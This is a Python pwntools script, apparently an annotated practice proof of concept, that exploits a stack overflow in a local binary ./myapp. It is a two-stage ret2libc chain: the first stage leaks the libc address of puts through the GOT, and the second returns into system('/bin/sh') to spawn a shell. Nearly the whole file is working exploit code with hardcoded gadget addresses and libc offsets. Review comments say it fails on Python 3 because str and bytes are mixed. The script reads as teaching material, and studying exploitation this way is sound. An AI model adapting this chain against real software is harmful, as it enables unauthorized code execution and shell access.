- # Two-stage ret2libc proof of concept for the local practice binary ./myapp,
- # driven with pwntools.  Stage 1 overflows the stack and returns into puts()
- # with the GOT slot of puts as argument, which prints the runtime address of
- # puts inside libc.  Stage 2 repeats the overflow and returns into
- # system("/bin/sh") at addresses derived from that leak.  Every constant below
- # is specific to one build of ./myapp and one libc version; the chain only
- # works because the binary is loaded at a fixed address (no PIE) and has no
- # stack canary -- either mitigation breaks it, which is what makes it a useful
- # teaching example.
- from pwn import *
- # Here we define the context of the exploit: Linux OS and amd64 architecture
- # (controls the word size used by p64/u64 below).
- context(os='linux', arch='amd64')
- # Addresses read out of the target binary, packed as little-endian 64-bit words.
- # The fixed 0x40xxxx values mean the binary is not position independent; with
- # PIE/ASLR on the executable every one of these would have to be leaked first.
- put_plt_addr = p64(0x401030)     # PLT stub for puts: call it to print a string
- put_got_addr = p64(0x404018)     # GOT slot holding the resolved libc address of puts
- main_plt_addr = p64(0x401094)    # re-entry point so the program can be overflowed again
-                                  # (named "_plt" but presumably the address of main -- confirm)
- pop_rdi_gadget = p64(0x401090)   # `pop rdi; ret` gadget to load the first argument register
- # 120 bytes of filler to reach the saved return address.  NOTE(review): this is
- # a str, and p64() returns bytes, so the `+=` lines below only work on Python 2
- # pwntools; on Python 3 they raise TypeError unless junk becomes b'A'*120.
- junk = 'A'*120
- # Stage-1 chain: [pad][pop rdi][&GOT puts][puts@plt][main]
- #   -> puts(GOT[puts]) prints the libc address of puts, then main restarts.
- payload = junk
- payload += pop_rdi_gadget
- payload += put_got_addr
- payload += put_plt_addr
- payload += main_plt_addr
- #print(payload)
- # Run the target locally (no remote host involved) and consume its prompt.
- p = process("./myapp")
- print(p.recvuntil("back?"))
- #print(p.recv())
- #print(p.recv())
- #print(p.recv())
- p.sendline(payload)
- # Skip the rest of the echoed line, then take the first 8 bytes of the leak.
- # puts stops at the first NUL, so typically only 6 significant bytes arrive;
- # ljust pads back to 8 so u64 can decode them.  (Same str/bytes caveat as
- # above: the "\x00" fill is a str.)
- p.recvuntil("\n")
- leaked = p.recv()[:8].strip().ljust(8, "\x00")
- log.success("Leaked Address = " +str(leaked))
- leaked = u64(leaked)
- # Offsets inside the specific libc build the binary was run against.  These
- # were obtained out of band; a different libc version invalidates all three.
- puts_libc = 0x71910      # offset of puts from the libc base
- system_libc = 0x449c0    # offset of system from the libc base
- sh_libc = 0x181519       # presumably offset of the "/bin/sh" string in libc -- confirm
- # leaked puts address minus puts' offset gives the libc load base; the author
- # calls it "offset".  This is what defeats libc ASLR for this one process.
- offset = leaked - puts_libc # offset between any function in the program and its address in libc
- sys = p64(offset+system_libc)
- sh = p64(offset+sh_libc)
- # Stage-2 chain: [pad][pop rdi][&"/bin/sh"][system] -> system("/bin/sh").
- payload2 = junk
- payload2 += pop_rdi_gadget
- payload2 += sh
- payload2 += sys
- # The binary is now back in main after stage 1, so wait for the same prompt.
- p.recvuntil("back?")
- p.sendline(payload2)
- # Hand the spawned shell's I/O to the user.
- p.interactive()